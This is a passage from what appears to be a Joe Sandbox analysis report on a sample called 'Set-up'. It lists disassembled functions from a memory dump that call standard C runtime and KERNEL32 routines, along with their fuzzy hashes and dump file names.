_errno.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB70432
_invalid_parameter_noinfo.MSVCR100(?,6BBB84F4,?,?,?,?,?,?,6BB6FDEB,?,00000000,00000000,00000002,?,00000002,?), ref: 6BB7043D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: __doserrno_errno$_invalid_parameter_noinfo
String ID:
API String ID: 2315031519-0
Opcode ID: 571cdb2bdbd45bd4b946ac23860b444b1cf29ed374d0dfc620e8a35407c9c3ff
Instruction ID: 6902922dd0eaf18fbbbe6660112c6bbfd3e6645b60e0a3f6a44affad3328f4b6
Opcode Fuzzy Hash: 571cdb2bdbd45bd4b946ac23860b444b1cf29ed374d0dfc620e8a35407c9c3ff
Instruction Fuzzy Hash: AFF090312442848BD722AB74C40172877B0AF82329F5002A5E4388B6E5DBBDD8429FA2

Function 6BB8007C Relevance: 7.5, APIs: 5, Instructions: 32memorythreadCOMMON

Download Yara Rule

APIs

Part of subcall function 6BB7B834: __EH_prolog3.LIBCMT ref: 6BB7B83B

TlsAlloc.KERNEL32 ref: 6BB8009D
GetLastError.KERNEL32 ref: 6BB800AD
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB800C6
_CxxThrowException.MSVCR100(00000000,6BBDFEB4,00000000), ref: 6BB800D5
Concurrency::details::UMSThreadScheduler::OneShotStaticConstruction.LIBCMT ref: 6BB800DA

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: AllocConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConstructionErrorExceptionH_prolog3LastScheduler::ShotStaticThreadThrow
String ID:
API String ID: 3767078539-0
Opcode ID: c5b024eb1bb4aa6f5d18dcbf7b1a87dae3205bb5f874eba6afc42b5758181f05
Instruction ID: 7423a59ab68d089bbd65ef4abd6f9e9ab42ff503eaf371e8d09a7da72898c7e2
Opcode Fuzzy Hash: c5b024eb1bb4aa6f5d18dcbf7b1a87dae3205bb5f874eba6afc42b5758181f05
Instruction Fuzzy Hash: D4F0EC329252804FDB207AB08D0B67E379CEF42328F184779E83AC30D0EB3DC0048A52

Function 6BB7D0C1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000000,?,00000000), ref: 6BB7D1B0
_memset.LIBCMT(00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 6BB7D1C3

Strings

,, xrefs: 6BB7D1F0
$, xrefs: 6BB7D1F4

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _memset
String ID: $$,
API String ID: 2102423945-53852779
Opcode ID: 78317c09046f200d96166056200ee0860819ba3a296969d6b915bb36821915cd
Instruction ID: e9531eadda880a0bf8633409d7c96a26f9dd440e481ea2b7bdd35aad7f3030cd
Opcode Fuzzy Hash: 78317c09046f200d96166056200ee0860819ba3a296969d6b915bb36821915cd
Instruction Fuzzy Hash: 0E41E771A44298BFDB21BFB8DC95AAD7BB4EF08394F104474F825A7200D7799D41CBA1

Function 6BB44202 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT(?), ref: 6BB4422C
_errno.MSVCR100 ref: 6BB68FDB
_invalid_parameter_noinfo.MSVCR100 ref: 6BB68FE6

Strings

I, xrefs: 6BB44232

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_wcslen
String ID: I
API String ID: 3151729805-3707901625
Opcode ID: a946e649708c495ba3de64228eefbbd13c8b602ca7283c3ef24064f5e4a28dd5
Instruction ID: 25243be0014a6ef926cae336e6dda713d6e374c6d37ca6409b0259c70c28cd2f
Opcode Fuzzy Hash: a946e649708c495ba3de64228eefbbd13c8b602ca7283c3ef24064f5e4a28dd5
Instruction Fuzzy Hash: FB018F72C00299ABDF008FA5CC01AAE7BB5FF45368F104A16E534A61C0EB7C86129FA5

Function 6BB50A05 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

_strlen.LIBCMT(?), ref: 6BB50A2F
_errno.MSVCR100 ref: 6BB68F41
_invalid_parameter_noinfo.MSVCR100 ref: 6BB68F4C

Strings

I, xrefs: 6BB50A3A

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo_strlen
String ID: I
API String ID: 1245117036-3707901625
Opcode ID: 104c0a01e2b9b4bfe5cf8e790197371b81950b518ee4aa113952663ec273a45e
Instruction ID: 77019002e50806dce8bf32320eee4c513e50bcfa51c328139a1f257a3e67df70
Opcode Fuzzy Hash: 104c0a01e2b9b4bfe5cf8e790197371b81950b518ee4aa113952663ec273a45e
Instruction Fuzzy Hash: AF01A272C0025AABDF009FA4CC01AEE7BB5FF44768F10461AE424A6180EB78C511CFA5

Function 6BB446C1 Relevance: 6.3, APIs: 4, Instructions: 262COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB713EC
_invalid_parameter_noinfo.MSVCR100 ref: 6BB713F7
_errno.MSVCR100 ref: 6BB71402
_invalid_parameter_noinfo.MSVCR100 ref: 6BB7140D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: 0f7806659183300477434c852ae5586eb72dadc6bc092987c5a806937287d50d
Instruction ID: 4d757380ad80c35c7ee22ce7156f55a094ff8a15d2e75309a34438ed2acca06e
Opcode Fuzzy Hash: 0f7806659183300477434c852ae5586eb72dadc6bc092987c5a806937287d50d
Instruction Fuzzy Hash: E2911934A082E99BCF018F69988019E7B75FF9A305F158099EC5497348DF38DE31EBA1

Function 6BB4B73E Relevance: 6.2, APIs: 4, Instructions: 160COMMON

Download Yara Rule

APIs

IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000), ref: 6BB4B7A7
GetCPInfo.KERNEL32(00000000,?), ref: 6BB4B7BA
_memset.LIBCMT(0000001D,00000000,00000101), ref: 6BB4B7D2
_memset.LIBCMT(0000001D,00000000,00000101,00000000,?,00000000), ref: 6BB6A8ED

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _memset$CodeInfoPageValid
String ID:
API String ID: 1608968462-0
Opcode ID: 65b5462968d36748cdd93f704151d908b4dae336bcd21e4b1346172991ab66c7
Instruction ID: 421614a8e5c9fdb6bf74106a594e64f302d270773f4d4df66113ea5db4228569
Opcode Fuzzy Hash: 65b5462968d36748cdd93f704151d908b4dae336bcd21e4b1346172991ab66c7
Instruction Fuzzy Hash: 015125319002A48BDF15CF69C8802BEBBB4FF41784F1584AAD995DB282E77DC902CF91

Function 6BB78F20 Relevance: 6.1, APIs: 4, Instructions: 123COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCR100(00000000,6BB80AF2), ref: 6BB78FFA
_memset.LIBCMT(00000000,00000000,?,00000000,6BB80AF2), ref: 6BB7900D
??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,6BB80AF2), ref: 6BB79014
?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100(?,?,?,?,?,6BB80AF2), ref: 6BB7905F

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Spin$??2@Concurrency@@Once@?$_Wait@$00@details@_memset
String ID:
API String ID: 4058414921-0
Opcode ID: 1cc0796d585264de71868dab890a4f645fb60629f8412fb2cc02d37df1274771
Instruction ID: b7e3f019bf7dfb3173cb4f9f1d142aa77397d851d1c992b4cca9a61f45b7c76f
Opcode Fuzzy Hash: 1cc0796d585264de71868dab890a4f645fb60629f8412fb2cc02d37df1274771
Instruction Fuzzy Hash: 0F5169305083819FD725DF29C980B1AB7F0FF89324F108A6DE5AA8B695D734E845CB92

Function 6BB419A5 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

_isleadbyte_l.MSVCR100(?,?,?,?,?,?), ref: 6BB492C2
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 6BB492E8
_errno.MSVCR100(?,?,?,?), ref: 6BB6A17D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: ByteCharMultiWide_errno_isleadbyte_l
String ID:
API String ID: 911568377-0
Opcode ID: 9808ba5f5d4f196bbc03797e1ac4799d564b5773375226d89a08b1198eb4e22b
Instruction ID: c551701c4944b1a97d25937025b8a96b5a8b6e838a9ed069025126c6b3fed7f7
Opcode Fuzzy Hash: 9808ba5f5d4f196bbc03797e1ac4799d564b5773375226d89a08b1198eb4e22b
Instruction Fuzzy Hash: F431B131A042E9EFDF10DFA4C880AAD3BB5FF02350B0846A9E4658B194E335DD51EB51

Function 6BB4EF9C Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

__isctype_l.LIBCMT(7FFFFFFF,00000001,00000000,0000009B,7FFFFFFF,00000000,00000000,00000000,00000000,0000009B,7FFFFFFF,00000000), ref: 6BB6A2E4
_isleadbyte_l.MSVCR100(00000008,00000000,0000009B,7FFFFFFF,00000000,00000000,00000000,00000000,0000009B), ref: 6BB6A320
__crtLCMapStringA.MSVCR100(00000000,?,00000100,00000000,00000001,7FFFFFFF,00000003,?,00000001,0000009B,7FFFFFFF,00000000,00000000,00000000,00000000,0000009B), ref: 6BB6A36D

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: String__crt__isctype_l_isleadbyte_l
String ID:
API String ID: 150061899-0
Opcode ID: f7d9de18de3688a9384fe264b6b44a006c77173d38ef939bd1b8464381d42120
Instruction ID: dca0db4aea38915230012a4d86dda69e5f6c48367525642ca7203c55c0f61b01
Opcode Fuzzy Hash: f7d9de18de3688a9384fe264b6b44a006c77173d38ef939bd1b8464381d42120
Instruction Fuzzy Hash: 6731F431908299AFEF05CBA8C886FEE7FB4EF01318F0440A9E5549F181D779D945DB61

Function 6BB3F6A8 Relevance: 6.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

_CallDestructExceptionObject.LIBCMT ref: 6BB3F721
_global_unwind2.MSVCR100(?), ref: 6BB3F72D
_local_unwind2.MSVCR100(?,?), ref: 6BB3F73A
_local_unwind2.MSVCR100(?,000000FF), ref: 6BB3F790

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _local_unwind2$CallDestructExceptionObject_global_unwind2
String ID:
API String ID: 277650583-0
Opcode ID: a9c57badb05076d457bd60b1244720519eeb5ec2f6905369dde1fe81f98cf5ae
Instruction ID: 413136f480cc9b74641c207b9051e151df9e60d9e9e4b5f368665be72536dcb5
Opcode Fuzzy Hash: a9c57badb05076d457bd60b1244720519eeb5ec2f6905369dde1fe81f98cf5ae
Instruction Fuzzy Hash: D731EA72A00218EBCB10DF68DCC196EB7A5FB04360F458165ED19DB244DB39FA55C7E0

Function 6BB4489C Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

_errno.MSVCR100 ref: 6BB6986D
_invalid_parameter_noinfo.MSVCR100 ref: 6BB69878
_errno.MSVCR100 ref: 6BB69881
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6988C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: c3d6eaa9eee9f134ec7c17922ac70990d059539d88e92a874fd5c09d6225e68c
Instruction ID: ea0bdd6a33312b10209f6238ae266a660ce6578f8eca15d2b219ff1acd6b9701
Opcode Fuzzy Hash: c3d6eaa9eee9f134ec7c17922ac70990d059539d88e92a874fd5c09d6225e68c
Instruction Fuzzy Hash: BA21C175E042E59FDB149F29C8416BA33B0FF56B94B1044D9E8918B348EB3D8D51F7A0

Function 6BB496F6 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_towlower_l.MSVCR100(?,?,?), ref: 6BB4973E

Part of subcall function 6BB42939: iswctype.MSVCR100(?,00000001,?,?,?,?,?,?,?), ref: 6BB4297D

_towlower_l.MSVCR100(?,?,?,?,?), ref: 6BB4974E
_errno.MSVCR100 ref: 6BB6C6CA
_invalid_parameter_noinfo.MSVCR100 ref: 6BB6C6D5

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _towlower_l$_errno_invalid_parameter_noinfoiswctype
String ID:
API String ID: 2204055994-0
Opcode ID: ba0f12c23ae9cc6553eda531eafe76f1f3573c430cfd055574d5848509f427d6
Instruction ID: bb2dfa86f4b85f1095062ba82c8dd7c523f9a95bf2f0ed1043d665a6d5509028
Opcode Fuzzy Hash: ba0f12c23ae9cc6553eda531eafe76f1f3573c430cfd055574d5848509f427d6
Instruction Fuzzy Hash: 9F2128769002E59BDF209EA9C9847BE37A8FF50A54B900496E8B0DB189F73CCD40E770

Function 6BB7A7E0 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

Part of subcall function 6BB7A9A9: _fabs.LIBCMT(00000000,00000000,00000000,00000000,?,6BB7A8D7,00000000,00000000,?,6BB7A6BD), ref: 6BB7A9E1

sqrt.MSVCR100(?,?,?,?,?), ref: 6BB7A85F
_fabs.LIBCMT(?,?,?,?,?), ref: 6BB7A86D

Part of subcall function 6BBC1157: __ctrlfp.LIBCMT ref: 6BBC1170
Part of subcall function 6BBC1157: __except1.LIBCMT ref: 6BBC11BC

_fabs.LIBCMT(?,?,?,?,?), ref: 6BB7A88E
exp.MSVCR100(?,?,?,?,?), ref: 6BB7A89C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _fabs$__ctrlfp__except1sqrt
String ID:
API String ID: 2723176039-0
Opcode ID: b42ecc07f8f9e55c7e34e27d70c430d7837316e2f5599714de65254d3c19d261
Instruction ID: 2fb8e336621b1ca50799822056fb85407815ba6a301aaf3a15275124c3bf94c2
Opcode Fuzzy Hash: b42ecc07f8f9e55c7e34e27d70c430d7837316e2f5599714de65254d3c19d261
Instruction Fuzzy Hash: 9D21C272E00508E7CB04BFB4E8855EEFBB4FF44254F2185A5E4A462280DF39D9708B95

Function 6BB55FCE Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

_wcspbrk.LIBCMT(?,6BB56018,?,00000000,6BB56602,?,?,?,?,?,?,6BB559BB), ref: 6BB55FF5
_calloc_crt.MSVCR100(00000004,00000001,?,00000000,6BB56602,?,?,?,?,?,?,6BB559BB), ref: 6BB5603C
free.MSVCR100(00000000,?,00000000,6BB56602,?,?,?,?,?,?,6BB559BB), ref: 6BB56078
_wmatch.LIBCMT ref: 6BB67738

Part of subcall function 6BB55F95: _malloc_crt.MSVCR100(00000008,?,6BB8CE77,?,00000000,-00000002,6BBE4BD8), ref: 6BB55F9C

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _calloc_crt_malloc_crt_wcspbrk_wmatchfree
String ID:
API String ID: 588445202-0
Opcode ID: 14448c9c310acf54b64c2c76568dee807d41b2909be9e33e54e7c18be478f936
Instruction ID: 7ddb8bf36b45a5c29629b205cb3d03602d0d41f1db6431768c35d722e5d631f6
Opcode Fuzzy Hash: 14448c9c310acf54b64c2c76568dee807d41b2909be9e33e54e7c18be478f936
Instruction Fuzzy Hash: DB212B77904950CFD713CF2DDA80529B7E4EF85760328415AD456D7120E637DC928BA1

Function 6BB80B09 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?,00000000,?,?,?,6BB80A36,00000000,00000001,?,?,6BB80A58), ref: 6BB80B2B
QueryDepthSList.KERNEL32(?,?,00000000,?,?,?,6BB80A36,00000000,00000001,?,?,6BB80A58), ref: 6BB80B3F
CloseHandle.KERNEL32(?,?,?,?,6BB80A36,00000000,00000001,?,?,6BB80A58), ref: 6BB80B61
InterlockedPushEntrySList.KERNEL32(?,-00000004,?,?,?,6BB80A36,00000000,00000001,?,?,6BB80A58), ref: 6BB80B79

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: List$CloseDepthEntryHandleInterlockedPushQueryValue
String ID:
API String ID: 94243546-0
Opcode ID: 14488d76c5d13ec89759827f04a410778dbacc21b14c3bf8f78e48aca00c6253
Instruction ID: 83f05d07a3615c5e2180228267750136d781a710b9203128cc5d85ef96174b30
Opcode Fuzzy Hash: 14488d76c5d13ec89759827f04a410778dbacc21b14c3bf8f78e48aca00c6253
Instruction Fuzzy Hash: 17212E315017549FDB20DF21C489FAE7BE8FF417A5F440469E85ACB291DB39E944CBA0

Function 6BB4CD87 Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

_lock_file.MSVCR100(?,6BB4CE28,00000014), ref: 6BB4CDD4

Part of subcall function 6BB4A557: _lock.MSVCR100(?,?,?,6BB96EA0,00000040,6BB96ED8,0000000C,6BB68676,00000000,?), ref: 6BB4A584

_fgetwc_nolock.MSVCR100(?,?,?,6BB4CE28,00000014), ref: 6BB4CDE9
_errno.MSVCR100(6BB4CE28,00000014), ref: 6BB52E04
_invalid_parameter_noinfo.MSVCR100(6BB4CE28,00000014), ref: 6BB686B0

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: _errno_fgetwc_nolock_invalid_parameter_noinfo_lock_lock_file
String ID:
API String ID: 3916178533-0
Opcode ID: e2b79a785d1c65c6de400191017f8368ea7313136f9fe7aef2dea12bae454a3d
Instruction ID: c1713e6b952f6a826b02243cf420ea4061831fe4ba9c49d917baf9e1c4968247
Opcode Fuzzy Hash: e2b79a785d1c65c6de400191017f8368ea7313136f9fe7aef2dea12bae454a3d
Instruction Fuzzy Hash: 25119D729412C6DFCB149FB8C9810AD77B0FF48724B20887AD46497188D73C99A6AB92

Function 6BB790E6 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT(?), ref: 6BB79107

Part of subcall function 6BBB3502: std::exception::_Copy_str.LIBCMT(6BB82171,?,?,6BB82171,6BB81FE2,?,6BB81FE2,00000001), ref: 6BBB351D

_CxxThrowException.MSVCR100(?,6BBDFE98), ref: 6BB7911C
Concurrency::unsupported_os::unsupported_os.LIBCMT ref: 6BB7913A
SetEvent.KERNEL32(?), ref: 6BB79185

Memory Dump Source

Source File: 00000009.00000002.2019504223.000000006BB31000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6BB30000, based on PE: true

Associated: 00000009.00000002.2019476971.000000006BB30000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019647930.000000006BBE3000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019676677.000000006BBE4000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000009.00000002.2019754163.000000006BBE8000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_6bb30000_Set-up.jbxd

Similarity

API ID: Concurrency::unsupported_os::unsupported_osCopy_strEventExceptionThrowstd::exception::_std::exception::exception
String ID:
API String ID: 1689211050-0
